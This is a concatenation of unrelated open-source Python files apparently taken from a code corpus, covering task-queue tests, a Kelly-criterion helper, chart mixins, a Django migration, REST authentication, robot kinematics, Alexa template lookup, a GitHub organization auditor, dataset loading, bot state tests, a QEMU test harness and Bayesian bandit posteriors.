test_collection = worker.mongodb_logs.tests_inserts
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.MongoInsert 3"
], block=False)
time.sleep(2)
# No started inserted.
assert jobs_collection.count() == 0
time.sleep(2)
# No success either, but we did insert
assert test_collection.count() == 1
assert jobs_collection.count() == 0
test_collection.remove({})
# However failed tasks get stored.
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.RaiseException 0"
], block=False)
time.sleep(2)
# Failed was inserted.
assert jobs_collection.count({"status": "failed", "path": "tests.tasks.general.RaiseException"}) == 1
# If we requeue and don't raise, should be OK and inserted this time, even in success
# no_storage depends on a raw queue, not a task path.
_id = jobs_collection.find_one()["_id"]
jobs_collection.update({"_id": _id}, {"$set": {"path": "tests.tasks.general.MongoInsert"}})
job = Job(_id).fetch(full_data=True)
job.requeue(queue="default")
time.sleep(1)
assert test_collection.count() == 1
assert jobs_collection.count() == 1
assert jobs_collection.count({"status": "success"}) == 1
jobs_collection.remove({})
# Test with retry: should be inserted
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.Retry 0"
], block=False)
assert jobs_collection.count({"status": "started"}) == 0
time.sleep(2)
assert jobs_collection.count({"status": "retry"}) == 1
|
qf_lib/common/utils/miscellaneous/kelly.py | webclinic017/qf-lib | 198 | 12770435 | <reponame>webclinic017/qf-lib
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.containers.series.simple_returns_series import SimpleReturnsSeries
def kelly(qf_series: QFSeries) -> float:
"""
Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for the series
of returns/prices.
Kelly Criterion assumptions:
1. You trade the same way you traded in the past.
2. Each return corresponds to one trade.
    3. Returns are normally distributed (the calculated value will be close to the ideal Kelly value even for highly
       skewed returns; tests showed that a relative difference of up to 10% might occur for extremely skewed
       distributions).
Parameters
----------
qf_series: QFSeries
timeseries of returns/prices. Each return/price must correspond to one trade.
Returns
-------
float
fraction of money that should be invested
"""
# it is important to convert a series to simple returns and not log returns
returns_tms = qf_series.to_simple_returns() # type: SimpleReturnsSeries
mean = returns_tms.mean()
variance = returns_tms.var()
kelly_criterion_value = mean / variance
return kelly_criterion_value
def kelly_binary(win_probability: float, win_size: float, lose_size: float) -> float:
"""
Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for a bet
that has two possible outcomes.
NOTE: This method should not be used to estimate the kelly value for a timeseries.
Parameters
----------
win_probability:float
probability of winning. Assumes that probability of losing is 1 - win_probability.
win_size: float
gain if we win.
        For example: 0.7 means that we gain an additional 70% of what we bet (if we bet $10 and win, we now have $17).
new_value = old_value * (1 + win_size)
lose_size: float
        loss if we lose. This value should be negative.
        For example: -0.2 means that we lose 20% of what we bet (if we bet $10 and lose, we now have $8).
new_value = old_value * (1 + lose_size)
Returns
-------
float
fraction of money that should be invested
"""
kelly_value = (-win_size * win_probability + lose_size * win_probability - lose_size) / (win_size * lose_size)
return kelly_value
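# --- Illustrative check (not part of the original qf-lib module) ---
# For an even-money bet (win +100%, lose -100%) with a 60% win probability, the
# binary Kelly fraction reduces to the classic p - q = 0.2; the numbers below are
# example values only.
if __name__ == "__main__":
    print(kelly_binary(win_probability=0.6, win_size=1.0, lose_size=-1.0))  # -> 0.2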
|
pyecharts/charts/mixins.py | CharileWithZoe/pyecharts | 11,032 | 12770442 | from ..render import engine
class ChartMixin:
def add_js_funcs(self, *fns):
for fn in fns:
self.js_functions.add(fn)
return self
def load_javascript(self):
return engine.load_javascript(self)
class CompositeMixin(ChartMixin):
def __iter__(self):
for chart in self._charts:
yield chart
def __len__(self):
return len(self._charts)
|
oauth/migrations/0003_auto_20190531_0914.py | enjoy-binbin/Django-blog | 111 | 12770470 | <reponame>enjoy-binbin/Django-blog
# Generated by Django 2.1.5 on 2019-05-31 09:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0002_auto_20190512_1129'),
]
operations = [
migrations.AlterModelOptions(
name='oauthconfig',
options={'ordering': ['-add_time'], 'verbose_name': '0-OAuth配置', 'verbose_name_plural': '0-OAuth配置'},
),
migrations.AlterModelOptions(
name='oauthuser',
options={'ordering': ['-add_time'], 'verbose_name': '1-Oauth用户', 'verbose_name_plural': '1-Oauth用户'},
),
]
|
rest-service/manager_rest/security/user_handler.py | TS-at-WS/cloudify-manager | 124 | 12770484 | <filename>rest-service/manager_rest/security/user_handler.py
#########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import string
from flask import current_app
from itsdangerous import BadSignature, SignatureExpired
from ..storage.idencoder import get_encoder
from cloudify.constants import CLOUDIFY_API_AUTH_TOKEN_HEADER
from manager_rest.storage.models import User
from manager_rest.manager_exceptions import NotFoundError
from manager_rest.storage import user_datastore, get_storage_manager
from manager_rest.execution_token import (set_current_execution,
get_current_execution_by_token,
get_execution_token_from_request)
ENCODED_ID_LENGTH = 5
def user_loader(request):
"""Attempt to retrieve the current user from the request
Either from request's Authorization attribute, or from the token header
Having this function makes sure that this will work:
> from flask_security import current_user
> current_user
<manager_rest.storage.models.User object at 0x50d9d10>
:param request: flask's request
:return: A user object, or None if not found
"""
if request.authorization:
return get_user_from_auth(request.authorization)
execution_token = get_execution_token_from_request(request)
if execution_token:
execution = get_current_execution_by_token(execution_token)
set_current_execution(execution) # Sets the request current execution
return execution.creator if execution else None
token = get_token_from_request(request)
if token:
_, _, user, _, _ = get_token_status(token)
return user
api_token = get_api_token_from_request(request)
if api_token:
user, user_token_key = extract_api_token(api_token)
return user
if current_app.external_auth \
and current_app.external_auth.can_extract_user_from_request():
user = current_app.external_auth.get_user_from_request(request)
if isinstance(user, User):
return user
return None
def extract_api_token(api_token):
user_id = api_token[:ENCODED_ID_LENGTH]
user_token_key = api_token[ENCODED_ID_LENGTH:]
user_id = get_encoder().decode(user_id)
try:
user = get_storage_manager().get(User, user_id)
except NotFoundError:
return None, None
return user, user_token_key
def get_user_from_auth(auth):
if not auth or not auth.username:
return None
if auth.username[0] not in string.ascii_letters:
return None
return user_datastore.get_user(auth.username)
def get_token_from_request(request):
token_auth_header = current_app.config[
'SECURITY_TOKEN_AUTHENTICATION_HEADER']
return request.headers.get(token_auth_header)
def get_api_token_from_request(request):
return request.headers.get(CLOUDIFY_API_AUTH_TOKEN_HEADER)
def get_token_status(token):
"""Mimic flask_security.utils.get_token_status with some changes
:param token: The token to decrypt
    :return: A tuple: (expired, invalid, user, data, error)
"""
security = current_app.extensions['security']
serializer = security.remember_token_serializer
max_age = security.token_max_age
user, data, error = None, None, None
expired, invalid = False, False
try:
data = serializer.loads(token, max_age=max_age)
except SignatureExpired:
expired = True
except (BadSignature, TypeError, ValueError) as e:
invalid = True
error = e
if data:
user = user_datastore.find_user(id=data[0])
return expired, invalid, user, data, error
|
sympybotics/kinematics.py | ZhangMeiHuiROS/Sym_RobotD | 117 | 12770488 |
import sympy
_id = lambda x: x
class Kinematics(object):
"""Robot symbolic Jacobians.
kinobj.J: list of link frame Jacobians - complete (6 x N):
[linear_velocity
angular_velocity] = J * joint_velocities
kinobj.Jc: list of link center-of-mass Jacobians - complete
kinobj.Jp: list of link frame Jacobians - linear velocity part only
kinobj.Jo: list of link frame Jacobians - angular velocity part only
kinobj.Jcp: list of link center-of-mass Jacobians - linear part
kinobj.Jco: list of link center-of-mass Jacobians - angular part
"""
def __init__(self, robotdef, geom, ifunc=None):
if not ifunc:
ifunc = _id
self.rbtdef = robotdef
self.geom = geom
self.dof = self.rbtdef.dof
def sym_skew(v):
return sympy.Matrix([[0, -v[2], v[1]],
[v[2], 0, -v[0]],
[-v[1], v[0], 0]])
if self.rbtdef._dh_convention == 'standard':
# extend z and p so that z[-1] and p[-1] return values from base
# frame
z_ext = geom.z + [sympy.Matrix([0, 0, 1])]
p_ext = geom.p + [sympy.zeros(3, 1)]
self.Jp = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jp[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jp[l][0:3, j] = ifunc(z_ext[j - 1])
else:
self.Jp[l][0:3, j] = ifunc(z_ext[j - 1].cross(
(p_ext[l] - p_ext[j - 1])).reshape(3, 1))
self.Jo = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jo[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jo[l][0:3, j] = sympy.zeros(3, 1)
else:
self.Jo[l][0:3, j] = ifunc(z_ext[j - 1])
elif self.rbtdef._dh_convention == 'modified':
self.Jp = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jp[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jp[l][0:3, j] = ifunc(geom.z[j])
else:
self.Jp[l][0:3, j] = ifunc(geom.z[j].cross(
(geom.p[l] - geom.p[j])).reshape(3, 1))
self.Jo = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jo[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jo[l][0:3, j] = sympy.zeros(3, 1)
else:
self.Jo[l][0:3, j] = ifunc(geom.z[j])
self.J = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.J[l] = self.Jp[l].col_join(self.Jo[l])
self.Jcp = list(range(self.rbtdef.dof))
self.Jco = self.Jo
for l in range(self.rbtdef.dof):
self.Jcp[l] = ifunc(self.Jp[l] - sym_skew(
geom.R[l] * sympy.Matrix(self.rbtdef.l[l])) * self.Jo[l])
self.Jc = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jc[l] = self.Jcp[l].col_join(self.Jco[l])
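# --- Hedged usage sketch (illustrative, not part of the original module) ---
# The attribute names below come from the class docstring above; the RobotDef /
# Geometry construction is an assumption based on the sympybotics package this
# file belongs to and is not verified here.
#
#     import sympybotics
#     rbtdef = sympybotics.RobotDef('Planar 2R',
#                                   [(0, 'l_1', 0, 'q'), (0, 'l_2', 0, 'q')],
#                                   dh_convention='standard')
#     geom = sympybotics.geometry.Geometry(rbtdef)
#     kin = Kinematics(rbtdef, geom)
#     J_ee = kin.J[-1]      # 6 x dof Jacobian of the last link frame
#     Jc_1 = kin.Jc[0]      # 6 x dof Jacobian of the first link's center of mass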
|
testproj/testproj/util.py | MilanPecov/drf-yasg | 2,788 | 12770494 | from django.templatetags.static import static
from django.utils.functional import lazy
static_lazy = lazy(static, str)
|
env/lib/python3.8/site-packages/ask_sdk_core/view_resolvers/locale_template_enumerator.py | adamash99/alexa-play-pot-of-greed | 496 | 12770512 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the
# License.
#
import os
import typing
from ask_sdk_runtime.view_resolvers import AbstractTemplateEnumerator
from ask_sdk_core.utils.view_resolver import split_locale
if typing.TYPE_CHECKING:
from typing import Iterator, Type
from ask_sdk_core.handler_input import HandlerInput
class LocaleTemplateEnumerator(AbstractTemplateEnumerator):
"""Enumerator to enumerate template name based on locale property.
Enumerate possible combinations of template name and given locale
from the HandlerInput.
    For example, for locale 'en-US' and a response template name "template",
the following combinations will be generated:
template/en/US
template/en_US
template/en
template_en_US
template_en
template
"""
__instance = None
def __new__(cls):
# type: (Type[object]) -> LocaleTemplateEnumerator
"""Creating a singleton class to re-use same enumerator instance for
different locale and template values.
"""
if LocaleTemplateEnumerator.__instance is None:
LocaleTemplateEnumerator.__instance = object.__new__(cls)
return LocaleTemplateEnumerator.__instance
def __init__(self):
# type: () -> None
"""Enumerator to generate different path combinations for a given
locale to load the template.
"""
pass
def generate_combinations(self, handler_input, template_name):
# type: (HandlerInput, str) -> Iterator[str]
"""Create a generator object to iterate over different combinations
of template name and locale property.
:param handler_input: Handler Input instance with
Request Envelope containing Request.
:type handler_input: :py:class:`ask_sdk_core.handler_input.HandlerInput`
:param template_name: Template name which needs to be loaded
:type template_name: str
:return: Generator object which returns
relative paths of the template file
:rtype: Iterator[str]
"""
locale = handler_input.request_envelope.request.locale
language, country = split_locale(locale=locale)
if not language and not country:
yield template_name
else:
yield os.path.join(template_name, language, country)
yield os.path.join(template_name, (language + "_" + country))
yield os.path.join(template_name, language)
yield (template_name + "_" + language + "_" + country)
yield (template_name + "_" + language)
yield template_name
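if __name__ == "__main__":
    # Hedged usage sketch (illustrative, not part of the original module): shows
    # the paths yielded for locale "en-US". The SimpleNamespace stand-in for
    # HandlerInput is an assumption made only for this sketch.
    from types import SimpleNamespace
    enumerator = LocaleTemplateEnumerator()
    fake_input = SimpleNamespace(
        request_envelope=SimpleNamespace(request=SimpleNamespace(locale="en-US")))
    for path in enumerator.generate_combinations(fake_input, "template"):
        print(path)
    # Expected output (on POSIX): template/en/US, template/en_US, template/en,
    # template_en_US, template_en, template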
|
security_monkey/auditors/github/org.py | boladmin/security_monkey | 4,258 | 12770530 | # Copyright 2017 Netflix
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.github.org
:platform: Unix
:synopsis: Auditor for GitHub Organizations
.. version:: $$VERSION$$
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from security_monkey.auditor import Auditor
from security_monkey.watchers.github.org import GitHubOrg
class GitHubOrgAuditor(Auditor):
index = GitHubOrg.index
i_am_singular = GitHubOrg.i_am_singular
i_am_plural = GitHubOrg.i_am_plural
def __init__(self, accounts=None, debug=False):
super(GitHubOrgAuditor, self).__init__(accounts=accounts, debug=debug)
def check_for_public_repo(self, org_item):
"""
        Checks whether the organization has public repositories. Default score of 0; this is mostly
        informational.
:param org_item:
:return:
"""
tag = "Organization contains public repositories."
if org_item.config["public_repos"] > 0:
self.add_issue(0, tag, org_item, notes="Organization contains public repositories")
def check_for_non_twofa_members(self, org_item):
"""
Alert if the org has users that don't have 2FA enabled.
        Will keep this at a level of 2 -- unless there are admins without 2FA, in which case it is level 10!
:param org_item:
:return:
"""
tag = "Organization contains users without 2FA enabled."
owner_no_twofa = "Organization owner does NOT have 2FA enabled!"
if len(org_item.config["no_2fa_members"]) > 0:
self.add_issue(2, tag, org_item, notes="Organization contains users without 2FA enabled")
for notwofa in org_item.config["no_2fa_members"]:
if notwofa in org_item.config["owners"]:
self.add_issue(10, owner_no_twofa, org_item, notes="Organization OWNER: {} does NOT "
"have 2FA enabled!".format(notwofa))
|
npt/datasets/income.py | jacobkimmel/non-parametric-transformers | 302 | 12770538 | <filename>npt/datasets/income.py
from pathlib import Path
import numpy as np
import pandas as pd
from sklearn.datasets import fetch_openml
from npt.datasets.base import BaseDataset
class IncomeDataset(BaseDataset):
def __init__(self, c):
super().__init__(
fixed_test_set_index=-99762)
self.c = c
def load(self):
"""KDD Income Dataset
Possibly used in VIME and TabNet.
There are multiple datasets called income.
https://archive.ics.uci.edu/ml/datasets/census+income
https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29
        The KDD one is significantly larger than the other one.
        We will take the KDD one. Neither TabNet nor VIME is explicit about
        which dataset they use.
        TabNet cites Oza et al. "Online Bagging and Boosting", which uses the
        bigger one. So we will start with that.
        (But there is no full TabNet code to confirm.)
Binary classification.
Target in last column.
        299,285 rows.
42 attributes. Use get_num_cat_auto to assign.
1 target
"""
# Load data from https://www.openml.org/d/4535
data_home = Path(self.c.data_path) / self.c.data_set
data = fetch_openml('Census-income', version=1, data_home=data_home)
# target in 'data'
self.data_table = data['data']
if isinstance(self.data_table, np.ndarray):
pass
elif isinstance(self.data_table, pd.DataFrame):
self.data_table = self.data_table.to_numpy()
self.N = self.data_table.shape[0]
self.D = self.data_table.shape[1]
# Target col is the last feature
# last column is target (V42)
# (binary classification, if income > or < 50k)
self.num_target_cols = []
self.cat_target_cols = [self.D - 1]
self.num_features, self.cat_features = BaseDataset.get_num_cat_auto(
self.data_table, cutoff=55)
print('income num cat features')
print(len(self.num_features))
print(len(self.cat_features))
# TODO: add missing entries to sanity check
self.missing_matrix = np.zeros((self.N, self.D), dtype=np.bool_)
self.is_data_loaded = True
self.tmp_file_or_dir_names = ['openml'] |
libraries/botbuilder-core/tests/test_private_conversation_state.py | Fl4v/botbuilder-python | 388 | 12770540 | <filename>libraries/botbuilder-core/tests/test_private_conversation_state.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import aiounittest
from botbuilder.core import MemoryStorage, TurnContext, PrivateConversationState
from botbuilder.core.adapters import TestAdapter
from botbuilder.schema import Activity, ChannelAccount, ConversationAccount
RECEIVED_MESSAGE = Activity(
text="received",
type="message",
channel_id="test",
conversation=ConversationAccount(id="convo"),
from_property=ChannelAccount(id="user"),
)
class TestPrivateConversationState(aiounittest.AsyncTestCase):
async def test_should_load_and_save_state_from_storage(self):
storage = MemoryStorage()
adapter = TestAdapter()
context = TurnContext(adapter, RECEIVED_MESSAGE)
private_conversation_state = PrivateConversationState(storage)
# Simulate a "Turn" in a conversation by loading the state,
# changing it and then saving the changes to state.
await private_conversation_state.load(context)
key = private_conversation_state.get_storage_key(context)
state = private_conversation_state.get(context)
assert state == {}, "State not loaded"
assert key, "Key not found"
state["test"] = "foo"
await private_conversation_state.save_changes(context)
# Check the storage to see if the changes to state were saved.
items = await storage.read([key])
assert key in items, "Saved state not found in storage."
assert items[key]["test"] == "foo", "Missing test value in stored state."
|
buildroot/support/testing/infra/emulator.py | rbrenton/hassos | 617 | 12770543 | <reponame>rbrenton/hassos
import pexpect
import infra
class Emulator(object):
def __init__(self, builddir, downloaddir, logtofile, timeout_multiplier):
self.qemu = None
self.downloaddir = downloaddir
self.logfile = infra.open_log_file(builddir, "run", logtofile)
# We use elastic runners on the cloud to runs our tests. Those runners
# can take a long time to run the emulator. Use a timeout multiplier
# when running the tests to avoid sporadic failures.
self.timeout_multiplier = timeout_multiplier
# Start Qemu to boot the system
#
# arch: Qemu architecture to use
#
# kernel: path to the kernel image, or the special string
# 'builtin'. 'builtin' means a pre-built kernel image will be
# downloaded from ARTEFACTS_URL and suitable options are
# automatically passed to qemu and added to the kernel cmdline. So
# far only armv5, armv7 and i386 builtin kernels are available.
# If None, then no kernel is used, and we assume a bootable device
# will be specified.
#
# kernel_cmdline: array of kernel arguments to pass to Qemu -append option
#
# options: array of command line options to pass to Qemu
#
def boot(self, arch, kernel=None, kernel_cmdline=None, options=None):
if arch in ["armv7", "armv5"]:
qemu_arch = "arm"
else:
qemu_arch = arch
qemu_cmd = ["qemu-system-{}".format(qemu_arch),
"-serial", "stdio",
"-display", "none"]
if options:
qemu_cmd += options
if kernel_cmdline is None:
kernel_cmdline = []
if kernel:
if kernel == "builtin":
if arch in ["armv7", "armv5"]:
kernel_cmdline.append("console=ttyAMA0")
if arch == "armv7":
kernel = infra.download(self.downloaddir,
"kernel-vexpress")
dtb = infra.download(self.downloaddir,
"vexpress-v2p-ca9.dtb")
qemu_cmd += ["-dtb", dtb]
qemu_cmd += ["-M", "vexpress-a9"]
elif arch == "armv5":
kernel = infra.download(self.downloaddir,
"kernel-versatile")
qemu_cmd += ["-M", "versatilepb"]
qemu_cmd += ["-kernel", kernel]
if kernel_cmdline:
qemu_cmd += ["-append", " ".join(kernel_cmdline)]
self.logfile.write("> starting qemu with '%s'\n" % " ".join(qemu_cmd))
self.qemu = pexpect.spawn(qemu_cmd[0], qemu_cmd[1:],
timeout=5 * self.timeout_multiplier,
env={"QEMU_AUDIO_DRV": "none"})
# We want only stdout into the log to avoid double echo
self.qemu.logfile_read = self.logfile
# Wait for the login prompt to appear, and then login as root with
# the provided password, or no password if not specified.
def login(self, password=None):
# The login prompt can take some time to appear when running multiple
# instances in parallel, so set the timeout to a large value
index = self.qemu.expect(["buildroot login:", pexpect.TIMEOUT],
timeout=60 * self.timeout_multiplier)
if index != 0:
self.logfile.write("==> System does not boot")
raise SystemError("System does not boot")
self.qemu.sendline("root")
if password:
self.qemu.expect("Password:")
self.qemu.sendline(password)
index = self.qemu.expect(["# ", pexpect.TIMEOUT])
if index != 0:
raise SystemError("Cannot login")
self.run("dmesg -n 1")
# Run the given 'cmd' with a 'timeout' on the target
# return a tuple (output, exit_code)
def run(self, cmd, timeout=-1):
self.qemu.sendline(cmd)
if timeout != -1:
timeout *= self.timeout_multiplier
self.qemu.expect("# ", timeout=timeout)
# Remove double carriage return from qemu stdout so str.splitlines()
# works as expected.
output = self.qemu.before.replace("\r\r", "\r").splitlines()[1:]
self.qemu.sendline("echo $?")
self.qemu.expect("# ")
exit_code = self.qemu.before.splitlines()[2]
exit_code = int(exit_code)
return output, exit_code
def stop(self):
if self.qemu is None:
return
self.qemu.terminate(force=True)
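# --- Hedged usage sketch (illustrative, not part of the original module) ---
# Typical flow inside a buildroot runtime test; `builddir`/`downloaddir` are
# assumed to point at an existing build tree, and the rootfs drive path and
# kernel command line below are examples, not taken from this file.
#
#     emulator = Emulator(builddir, downloaddir, logtofile=False,
#                         timeout_multiplier=1)
#     emulator.boot(arch="armv7", kernel="builtin",
#                   kernel_cmdline=["root=/dev/vda"],
#                   options=["-drive",
#                            "file={}/images/rootfs.ext2,if=virtio,format=raw".format(builddir)])
#     emulator.login()
#     output, exit_code = emulator.run("uname -r")
#     emulator.stop()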
|
SMPyBandits/Policies/Posterior/DiscountedBeta.py | balbok0/SMPyBandits | 309 | 12770557 | # -*- coding: utf-8 -*-
r""" Manipulate posteriors of Bernoulli/Beta experiments., for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`).
"""
from __future__ import division, print_function # Python 2 compatibility
__author__ = "<NAME>"
__version__ = "0.9"
# Local imports
try:
from .Beta import Beta, bernoulliBinarization
from .with_proba import with_proba
except (ImportError, SystemError):
from Beta import Beta, bernoulliBinarization
from with_proba import with_proba
try:
from numpy.random import beta as betavariate # Faster! Yes!
except ImportError:
from random import betavariate
from scipy.special import btdtri
# --- Constants
#: Default value for the discount factor :math:`\gamma\in(0,1)`.
#: ``0.95`` is empirically a reasonable value for short-term non-stationary experiments.
GAMMA = 0.95
# --- Class
class DiscountedBeta(Beta):
r""" Manipulate posteriors of Bernoulli/Beta experiments, for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`).
- It keeps :math:`\tilde{S}(t)` and :math:`\tilde{F}(t)` the *discounted* counts of successes and failures (S and F).
"""
def __init__(self, gamma=GAMMA, a=1, b=1):
r""" Create a Beta posterior :math:`\mathrm{Beta}(\alpha, \beta)` with no observation, i.e., :math:`\alpha = 1` and :math:`\beta = 1` by default."""
assert a >= 0, "Error: parameter 'a' for Beta posterior has to be >= 0." # DEBUG
self._a = a
assert b >= 0, "Error: parameter 'b' for Beta posterior has to be >= 0." # DEBUG
self._b = b
        self.N = [0, 0]  #: Discounted counts [failures, successes], added to the priors b and a respectively
assert 0 < gamma <= 1, "Error: for a DiscountedBayesianIndexPolicy policy, the discount factor has to be in (0,1], but it was {}.".format(gamma) # DEBUG
if gamma == 1:
print("Warning: gamma = 1 is stupid, just use a regular Beta posterior!") # DEBUG
self.gamma = gamma #: Discount factor :math:`\gamma\in(0,1)`.
def __str__(self):
return r"DiscountedBeta(\alpha={:.3g}, \beta={:.3g})".format(self.N[1], self.N[0])
def reset(self, a=None, b=None):
"""Reset alpha and beta, both to 0 as when creating a new default DiscountedBeta."""
if a is None:
a = self._a
if b is None:
b = self._b
self.N = [0, 0]
def sample(self):
"""Get a random sample from the DiscountedBeta posterior (using :func:`numpy.random.betavariate`).
- Used only by :class:`Thompson` Sampling and :class:`AdBandits` so far.
"""
return betavariate(self._a + self.N[1], self._b + self.N[0])
def quantile(self, p):
"""Return the p quantile of the DiscountedBeta posterior (using :func:`scipy.stats.btdtri`).
- Used only by :class:`BayesUCB` and :class:`AdBandits` so far.
"""
return btdtri(self._a + self.N[1], self._b + self.N[0], p)
# Bug: do not call btdtri with (0.5,0.5,0.5) in scipy version < 0.9 (old)
def forget(self, obs):
"""Forget the last observation, and undiscount the count of observations."""
# print("Info: calling DiscountedBeta.forget() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG
# FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}...
binaryObs = bernoulliBinarization(obs)
self.N[binaryObs] = (self.N[binaryObs] - 1) / self.gamma
otherObs = 1 - binaryObs
self.N[otherObs] = self.N[otherObs] / self.gamma
def update(self, obs):
r""" Add an observation, and discount the previous observations.
- If obs is 1, update :math:`\alpha` the count of positive observations,
- If it is 0, update :math:`\beta` the count of negative observations.
- But instead of using :math:`\tilde{S}(t) = S(t)` and :math:`\tilde{N}(t) = N(t)`, they are updated at each time step using the discount factor :math:`\gamma`:
.. math::
\tilde{S}(t+1) &= \gamma \tilde{S}(t) + r(t),
\tilde{F}(t+1) &= \gamma \tilde{F}(t) + (1 - r(t)).
.. note:: Otherwise, a trick with :func:`bernoulliBinarization` has to be used.
"""
# print("Info: calling DiscountedBeta.update() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG
# FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}...
binaryObs = bernoulliBinarization(obs)
self.N[binaryObs] = self.gamma * self.N[binaryObs] + 1
otherObs = 1 - binaryObs
self.N[otherObs] = self.gamma * self.N[otherObs]
def discount(self):
r""" Simply discount the old observation, when no observation is given at this time.
.. math::
\tilde{S}(t+1) &= \gamma \tilde{S}(t),
\tilde{F}(t+1) &= \gamma \tilde{F}(t).
"""
# print("Info: calling DiscountedBeta.discount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG
self.N[0] = max(0, self.gamma * self.N[0])
self.N[1] = max(0, self.gamma * self.N[1])
def undiscount(self):
r""" Simply cancel the discount on the old observation, when no observation is given at this time.
.. math::
\tilde{S}(t+1) &= \frac{1}{\gamma} \tilde{S}(t),
\tilde{F}(t+1) &= \frac{1}{\gamma} \tilde{F}(t).
"""
# print("Info: calling DiscountedBeta.undiscount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG
self.N[0] = max(0, self.N[0] / self.gamma)
self.N[1] = max(0, self.N[1] / self.gamma)
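if __name__ == "__main__":
    # Hedged usage sketch (illustrative, not part of the original module): shows
    # how the discounted success/failure counts evolve with rewards in {0, 1}.
    posterior = DiscountedBeta(gamma=0.9)
    for reward in [1, 1, 0, 1]:
        posterior.update(reward)
    print(posterior)            # discounted alpha/beta after four observations
    posterior.discount()        # no observation this step: both counts shrink by gamma
    print(posterior.sample())   # one random draw from the induced Beta posterior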
|
tests/communication/utils.py | yangboz/maro | 598 | 12770564 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import socket
from maro.communication import Proxy
def get_random_port():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as temp_socket:
temp_socket.bind(("", 0))
random_port = temp_socket.getsockname()[1]
return random_port
def proxy_generator(component_type, redis_port):
proxy_parameters = {
"group_name": "communication_unit_test",
"redis_address": ("localhost", redis_port),
"log_enable": False
}
component_type_expected_peers_map = {
"receiver": {"sender": 1},
"sender": {"receiver": 1},
"master": {"worker": 5},
"worker": {"master": 1}
}
proxy = Proxy(
component_type=component_type,
expected_peers=component_type_expected_peers_map[component_type],
**proxy_parameters
)
return proxy
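# --- Hedged usage sketch (illustrative, not part of the original test utilities) ---
# Assumes a Redis server is reachable on the chosen port; both proxies join the
# same "communication_unit_test" group and discover each other as peers.
#
#     redis_port = get_random_port()
#     sender = proxy_generator("sender", redis_port)
#     receiver = proxy_generator("receiver", redis_port)
#     # exchange messages via the maro.communication.Proxy messaging API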
|
chapter5_operations/prediction_monitoring_pattern/src/ml/data.py | sudabon/ml-system-in-actions | 133 | 12770567 | <reponame>sudabon/ml-system-in-actions
from typing import List
from pydantic import BaseModel
class Data(BaseModel):
data: List[List[float]] = [[5.1, 3.5, 1.4, 0.2]]
|
oslo_messaging/tests/rpc/test_dispatcher.py | sapcc/oslo.messaging | 131 | 12770589 | <gh_stars>100-1000
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
